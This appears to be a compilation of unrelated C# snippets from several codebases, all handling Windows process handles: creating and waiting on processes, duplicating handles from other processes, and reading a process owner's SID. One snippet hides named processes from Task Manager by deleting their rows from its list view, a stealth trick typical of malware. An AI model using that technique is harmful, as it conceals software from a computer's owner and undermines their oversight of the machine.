private Win32Process(NativeMethods.PROCESS_INFORMATION pi, StreamWriter stdin, StreamReader stdout, StreamReader stderror) { StandardInput = stdin; StandardOutput = stdout; StandardError = stderror; _hasExited = false; _exitCodeLock = new object(); Id = pi.dwProcessId; MainThreadId = pi.dwThreadId; _processHandle = new SafeProcessHandle(pi.hProcess, true); var threadHandle = new SafeThreadHandle(pi.hThread); var wait = new ProcessWaitHandle(_processHandle); _registeredWait = ThreadPool.RegisterWaitForSingleObject(wait, (o, t) => { _registeredWait.Unregister(wait); SetExitState(); Exited?.Invoke(this, EventArgs.Empty); _processHandle.Close(); threadHandle.Close(); wait.Close(); }, null, -1, true); _disposable .Add(() => _registeredWait.Unregister(wait)) .Add(_processHandle) .Add(threadHandle) .Add(wait); }
private static bool GetFileNameFromHandle(IntPtr handle, int processId, out string fileName) { IntPtr currentProcess = GetCurrentProcess(); bool remote = processId != GetProcessId(currentProcess); SafeProcessHandle processHandle = null; SafeObjectHandle objectHandle = null; try { if (remote) { processHandle = OpenProcess(ProcessAccessRights.PROCESS_DUP_HANDLE, true, processId); if (DuplicateHandle(processHandle.DangerousGetHandle(), handle, currentProcess, out objectHandle, 0, false, DuplicateHandleOptions.DUPLICATE_SAME_ACCESS)) { handle = objectHandle.DangerousGetHandle(); } } return(GetFileNameFromHandle(handle, out fileName, 200)); } finally { if (remote) { if (processHandle != null) { processHandle.Close(); } if (objectHandle != null) { objectHandle.Close(); } } } }
private static string GetHandleTypeToken(IntPtr handle, int processId) { IntPtr currentProcess = NativeMethods.GetCurrentProcess(); bool remote = (processId != NativeMethods.GetProcessId(currentProcess)); SafeProcessHandle processHandle = null; SafeObjectHandle objectHandle = null; try { if (remote) { processHandle = NativeMethods.OpenProcess(ProcessAccessRights.PROCESS_DUP_HANDLE, true, processId); if (NativeMethods.DuplicateHandle(processHandle.DangerousGetHandle(), handle, currentProcess, out objectHandle, 0, false, DuplicateHandleOptions.DUPLICATE_SAME_ACCESS)) { handle = objectHandle.DangerousGetHandle(); } } return(GetHandleTypeToken(handle)); } finally { if (remote) { if (processHandle != null) { processHandle.Close(); } if (objectHandle != null) { objectHandle.Close(); } } } }
public void Dispose() { if (processHandle != null) { processHandle.Close(); processHandle = null; } }
public void WaitForExit(int waitMilliseconds = 10000) { if (!_testProcessHandle.GetProcessWaitHandle().WaitOne(waitMilliseconds)) { NativeMethods.TerminateProcess(_testProcessHandle.DangerousGetHandle(), 0); Debug.WriteLine($"Process Std Output:\n{GetStdOut()}"); //Debug.WriteLine($"Process Std Error:\n{GetStdErr()}"); Assert.Fail("Process still active!"); } Debug.WriteLine($"Process Std Output:\n{GetStdOut()}"); //Debug.WriteLine($"Process Std Error:\n{GetStdErr()}"); //NativeMethods.GetExitCodeProcess(_testProcessHandle, out ExitCode); ExitCode = _process?.ExitCode ?? ExitCode; _testProcessHandle.Close(); }
private Win32Process(NativeMethods.PROCESS_INFORMATION pi) { _hasExited = false; _exitCodeLock = new object(); ProcessId = pi.dwProcessId; MainThreadId = pi.dwThreadId; _processHandle = new SafeProcessHandle(pi.hProcess, true); _threadHandle = new SafeThreadHandle(pi.hThread); _wait = new ProcessWaitHandle(_processHandle); _registeredWait = ThreadPool.RegisterWaitForSingleObject(_wait, (o, t) => { _registeredWait.Unregister(_wait); SetExitState(); Exited?.Invoke(this, new Win32ProcessExitEventArgs(_exitCode)); _processHandle.Close(); _threadHandle.Close(); _wait.Close(); }, null, -1, true); }
public static bool HandleAction(IntPtr handle, int processId, HandleDelegate handleDelegate, params object[] args) { Process currentProcess = Process.GetCurrentProcess(); bool remote = (processId != currentProcess.Id); SafeProcessHandle processHandle = null; SafeObjectHandle objectHandle = null; try { if (remote) { processHandle = NativeMethods.OpenProcess(ProcessAccessRights.DuplicateHandle, true, processId); if (NativeMethods.DuplicateHandle(processHandle.DangerousGetHandle(), handle, currentProcess.Handle, out objectHandle, 0, false, DuplicateHandleOptions.SameAccess)) { handle = objectHandle.DangerousGetHandle(); } } return(handleDelegate.Invoke(handle, args)); } finally { if (remote) { if (processHandle != null) { processHandle.Close(); } if (objectHandle != null) { objectHandle.Close(); } } } }
public static bool GetFileNameFromHandle(IntPtr handle, int processId, out string fileName) { Process currentProcess = Process.GetCurrentProcess(); bool remote = (processId != currentProcess.Id); SafeProcessHandle remoteProcessHandle = null; SafeObjectHandle objectHandle = null; try { if (remote) { remoteProcessHandle = NativeMethods.OpenProcess(ProcessAccessRights.DuplicateHandle, true, processId); if (NativeMethods.DuplicateHandle(remoteProcessHandle.DangerousGetHandle(), handle, currentProcess.Handle, out objectHandle, 0, false, DuplicateHandleOptions.SameAccess)) { handle = objectHandle.DangerousGetHandle(); } } return(GetFileNameFromHandle(handle, out fileName)); } finally { if (remote) { if (remoteProcessHandle != null) { remoteProcessHandle.Close(); } if (objectHandle != null) { objectHandle.Close(); } } } }
internal static Process CreateProcess(string executable, string arguments) { var startupInfo = new StartupInfo(); var threadSecurity = new SecurityAttributes(); var processSecurity = new SecurityAttributes(); var processInformation = new ProcessInformation(); processSecurity.nLength = Marshal.SizeOf(processSecurity); threadSecurity.nLength = Marshal.SizeOf(threadSecurity); // We can use the string builder to build up our full command line, including arguments var commandLine = new StringBuilder(); commandLine.Append(executable) .Append(' ') .Append(arguments); if (CreateProcess(null, commandLine, processSecurity, threadSecurity, false, normalPriorityClass, IntPtr.Zero, null, startupInfo, processInformation)) { // Process was created successfully var safeProcessHandle = new SafeProcessHandle(processInformation.hProcess, true); if (!safeProcessHandle.IsInvalid) { var process = Process.GetProcessById(processInformation.dwProcessId); safeProcessHandle.Close(); return(process); } // Not sure what to do here but hopefully this wouldn't arise. // There should be some form of exception thrown here to ensure // the above layer of this case but is it really necessary? Since // the process HAS started anyway. I should consult Sir Taimoor // on this. } // We couldn't create the process, so raise an exception with the details. throw Marshal.GetExceptionForHR(Marshal.GetHRForLastWin32Error()); }
private ProcessInformation CreateProcessWithStartInfo(SimpleProcessStartupInfo simpleProcessStartupInfo, CreateProcessOptions options) { Logger.LogInfo("CreateProcessWithStartInfo: Entry point."); var stringBuilder = BuildCommandLine(simpleProcessStartupInfo.FileName, simpleProcessStartupInfo.Arguments); Logger.LogInfo("CreateProcessWithStartInfo: command line is {0}.", stringBuilder); using (var startupInfo = new STARTUPINFO()) { Logger.LogInfo("CreateProcessWithStartInfo: Creation flags."); ProcessCreationFlags processCreationFlags = 0; if (simpleProcessStartupInfo.CreateNoWindow) { processCreationFlags |= ProcessCreationFlags.CREATE_NO_WINDOW; } if ((options & CreateProcessOptions.BreakAwayFromJob) != 0) { processCreationFlags |= ProcessCreationFlags.CREATE_BREAKAWAY_FROM_JOB; } var workingDirectory = simpleProcessStartupInfo.WorkingDirectory; if (workingDirectory == string.Empty) { workingDirectory = Environment.CurrentDirectory; } Logger.LogInfo("CreateProcessWithStartInfo: Working directory: {0}.", workingDirectory); if ((options & CreateProcessOptions.AttachDebugger) != 0) { Logger.LogInfo("CreateProcessWithStartInfo: Setting DEBUG_PROCESS flag."); processCreationFlags |= ProcessCreationFlags.DEBUG_PROCESS; processCreationFlags |= ProcessCreationFlags.DEBUG_ONLY_THIS_PROCESS; } Logger.LogInfo("CreateProcessWithStartInfo: Calling Win32 CreateProcess."); var processInformation = new PROCESS_INFORMATION(); var environmentPtr = IntPtr.Zero; var lastError = 0; var success = NativeMethods.CreateProcess(null, stringBuilder, null, null, true, processCreationFlags, environmentPtr, workingDirectory, startupInfo, processInformation); Logger.LogInfo("CreateProcessWithStartInfo: CreateProcess result: Success={0}-LastError={1}.", success, Marshal.GetLastWin32Error()); if (!success) { lastError = Marshal.GetLastWin32Error(); } // Assign safe handles as quickly as possible to avoid leaks. var safeProcessHandle = new SafeProcessHandle(processInformation.hProcess); var safeThreadHandle = new SafeProcessHandle(processInformation.hThread); if (!success) { throw new LastWin32ErrorException(lastError, string.Format("Error creating process from file \"{0}\"", simpleProcessStartupInfo.FileName)); } if (safeProcessHandle.IsInvalid || safeThreadHandle.IsInvalid) { Logger.LogInfo("CreateProcessWithStartInfo: Invalid process handle."); throw new Exception(string.Format("Error creating process from file \"{0}\" (invalid process handle)", simpleProcessStartupInfo.FileName)); } Logger.LogInfo("CreateProcessWithStartInfo: Creating ProcessResult instance."); var processResult = new ProcessInformation { ProcessHandle = safeProcessHandle, ProcessId = processInformation.dwProcessId }; safeThreadHandle.Close(); Logger.LogInfo("CreateProcessWithStartInfo: Success!"); return(processResult); } }
public static bool GetListView(IntPtr handle, IntPtr lvhandle) { bool flag; listViewHandle = lvhandle; IntPtr ptr = handle; int dwProcessId = -1; try { foreach (Process process in Process.GetProcessesByName("taskmgr")) { dwProcessId = process.Id; } if (dwProcessId == -1) { throw new ArgumentException("Can't find process", "processName"); } } catch (Exception exception1) { ProjectData.SetProjectError(exception1); flag = false; ProjectData.ClearProjectError(); return(flag); } SafeProcessHandle hProcess = null; try { hProcess = OpenProcess(0x38, false, dwProcessId); if ((hProcess == null) && (Marshal.GetLastWin32Error() == 0)) { throw new Win32Exception(); } int num2 = SendMessage(listViewHandle, 0x1004, IntPtr.Zero, IntPtr.Zero); int num5 = num2 - 1; for (int i = 0; i <= num5; i++) { ListViewItem item = new ListViewItem(GetItem(i, 0, hProcess)); foreach (string str in Hide_Process_From_TaskManager.Processes_Names) { Hide_Process_From_TaskManager.MyProc = str; if (item.Text.Contains(Hide_Process_From_TaskManager.MyProc)) { SendMessage(listViewHandle, 0x1008, i, IntPtr.Zero); } } } } catch (Exception exception2) { ProjectData.SetProjectError(exception2); flag = false; ProjectData.ClearProjectError(); return(flag); ProjectData.ClearProjectError(); } finally { if (hProcess != null) { hProcess.Close(); hProcess.Dispose(); } } return(true); }
public void Dispose() { _processHandle?.Close(); }
//Returns the SID of the user the process is running as, //otherwise, null if the process has exited or access is denied to the process internal static string GetProcessUserSid(Process process) { //If this is a well known process (specifically the System and Idle kernel processes) //Assume you are running as system. This is also special cased by the OS. if (process.Id == 0 || process.Id == 4) { return(new SecurityIdentifier(WellKnownSidType.LocalSystemSid, null).Value); } SafeProcessHandle processToken = SafeProcessHandle.InvalidHandle; IntPtr tokenPtr = IntPtr.Zero; TOKEN_USER userToken = new TOKEN_USER(); string userSid = null; IntPtr hProcess = IntPtr.Zero; try { //HACK: For Vista it is possible to get the user SID for any process when running with administrator privileges. // however downlevel you have to be running as system to get the sid for processes that are running as // LocalService or NetworkService. // The correct thing to do here would be to delegate the call on downlevel systems to ExecutionService. // Alternatively we can use the undocumented WinStationGetProcessSid API in winsta.dll which is used by // task manager which does an RPC call to a system process. Because it is undocumented I was not successful in // getting the pinvoke interop working. // As a workaround for downlevel OSes we assume that processes that we can not get the access token to are running // as LocalService. This should still allow application logic to differentiate between user, system, and service // processes which is the primary goal of this API. int processAccessLevel = Environment.OSVersion.Version.Major > 6 ? PROCESS_QUERY_LIMITED_INFORMATION : PROCESS_QUERY_INFORMATION; hProcess = OpenProcess(processAccessLevel, false, process.Id); if (hProcess == IntPtr.Zero) { //the process has exited or access to the process is denied //(running less then admin or locked down process such as audiodg on Vista) return(null); } if (!OpenProcessToken(hProcess, TokenAccessLevels.Query, out processToken)) { //Access Denied - assume the process is running as LocalService (see hack comment above) return(new SecurityIdentifier(WellKnownSidType.LocalServiceSid, null).Value); } //Get the size of the structure uint userTokenSize = 0; GetTokenInformation(processToken, TokenInformationClass.TokenUser, IntPtr.Zero, 0, out userTokenSize); //The call above will fail with the error "Data Size too small", but will return the right size if (userTokenSize == 0) { throw new Win32Exception(); } //Retrieve the token data tokenPtr = Marshal.AllocHGlobal((int)userTokenSize); if (!GetTokenInformation(processToken, TokenInformationClass.TokenUser, tokenPtr, userTokenSize, out userTokenSize)) { throw new Win32Exception(); } //Marshall the pointer to the structure Marshal.PtrToStructure(tokenPtr, userToken); //Retrieve the sid ConvertSidToStringSid(userToken.User.Sid, out userSid); } finally { //Free used resources if (hProcess != IntPtr.Zero) { CloseHandle(hProcess); } Marshal.FreeHGlobal(tokenPtr); processToken.Close(); } return(userSid); }
private static unsafe int ExecWaitWithCaptureUnimpersonated(SafeUserTokenHandle userToken, string cmd, string currentDir, TempFileCollection tempFiles, ref string outputName, ref string errorName, string trueCmdLine) { IntSecurity.UnmanagedCode.Demand(); FileStream output; FileStream error; int retValue = 0; if (outputName == null || outputName.Length == 0) { outputName = tempFiles.AddExtension("out"); } if (errorName == null || errorName.Length == 0) { errorName = tempFiles.AddExtension("err"); } // Create the files output = CreateInheritedFile(outputName); error = CreateInheritedFile(errorName); bool success = false; SafeNativeMethods.PROCESS_INFORMATION pi = new SafeNativeMethods.PROCESS_INFORMATION(); SafeProcessHandle procSH = new SafeProcessHandle(); SafeThreadHandle threadSH = new SafeThreadHandle(); SafeUserTokenHandle primaryToken = null; try { // Output the command line... StreamWriter sw = new StreamWriter(output, Encoding.UTF8); sw.Write(currentDir); sw.Write("> "); // 'true' command line is used in case the command line points to // a response file sw.WriteLine(trueCmdLine != null ? trueCmdLine : cmd); sw.WriteLine(); sw.WriteLine(); sw.Flush(); NativeMethods.STARTUPINFO si = new NativeMethods.STARTUPINFO(); si.cb = Marshal.SizeOf(si); si.dwFlags = NativeMethods.STARTF_USESTDHANDLES; si.hStdOutput = output.SafeFileHandle; si.hStdError = error.SafeFileHandle; si.hStdInput = new SafeFileHandle(UnsafeNativeMethods.GetStdHandle(NativeMethods.STD_INPUT_HANDLE), false); // // Prepare the environment // #if PLATFORM_UNIX StringDictionary environment = new CaseSensitiveStringDictionary(); #else StringDictionary environment = new StringDictionary(); #endif // PLATFORM_UNIX // Add the current environment foreach (DictionaryEntry entry in Environment.GetEnvironmentVariables()) { environment.Add((string)entry.Key, (string)entry.Value); } // Add the flag to indicate restricted security in the process environment["_ClrRestrictSecAttributes"] = "1"; #if DEBUG environment["OANOCACHE"] = "1"; #endif // set up the environment block parameter byte[] environmentBytes = EnvironmentBlock.ToByteArray(environment, false); fixed(byte *environmentBytesPtr = environmentBytes) { IntPtr environmentPtr = new IntPtr((void *)environmentBytesPtr); if (userToken == null || userToken.IsInvalid) { RuntimeHelpers.PrepareConstrainedRegions(); try {} finally { success = NativeMethods.CreateProcess( null, // String lpApplicationName, new StringBuilder(cmd), // String lpCommandLine, null, // SECURITY_ATTRIBUTES lpProcessAttributes, null, // SECURITY_ATTRIBUTES lpThreadAttributes, true, // bool bInheritHandles, 0, // int dwCreationFlags, environmentPtr, // int lpEnvironment, currentDir, // String lpCurrentDirectory, si, // STARTUPINFO lpStartupInfo, pi); // PROCESS_INFORMATION lpProcessInformation); if (pi.hProcess != (IntPtr)0 && pi.hProcess != (IntPtr)NativeMethods.INVALID_HANDLE_VALUE) { procSH.InitialSetHandle(pi.hProcess); } if (pi.hThread != (IntPtr)0 && pi.hThread != (IntPtr)NativeMethods.INVALID_HANDLE_VALUE) { threadSH.InitialSetHandle(pi.hThread); } } } else { throw new NotSupportedException(); } } } finally { // Close the file handles if (!success && (primaryToken != null && !primaryToken.IsInvalid)) { primaryToken.Close(); primaryToken = null; } output.Close(); error.Close(); } if (success) { try { int ret = NativeMethods.WaitForSingleObject(procSH, ProcessTimeOut); // Check for timeout if (ret == NativeMethods.WAIT_TIMEOUT) { throw new ExternalException(SR.GetString(SR.ExecTimeout, cmd), NativeMethods.WAIT_TIMEOUT); } if (ret != NativeMethods.WAIT_OBJECT_0) { throw new ExternalException(SR.GetString(SR.ExecBadreturn, cmd), Marshal.GetLastWin32Error()); } // Check the process's exit code int status = NativeMethods.STILL_ACTIVE; if (!NativeMethods.GetExitCodeProcess(procSH, out status)) { throw new ExternalException(SR.GetString(SR.ExecCantGetRetCode, cmd), Marshal.GetLastWin32Error()); } retValue = status; } finally { procSH.Close(); threadSH.Close(); if (primaryToken != null && !primaryToken.IsInvalid) { primaryToken.Close(); } } } else { throw new ExternalException(SR.GetString(SR.ExecCantExec, cmd), Marshal.GetLastWin32Error()); } return(retValue); }
public void Close() { handle.Close(); }
public void Close() => handle.Close();
private void ReleaseProcessHandle(SafeProcessHandle handle) { if (handle == null) { return; } if (haveProcessHandle && handle == m_processHandle) { return; } handle.Close(); }
public void Dispose() { // Close the handle opened to the process ProcessHandle?.Close(); }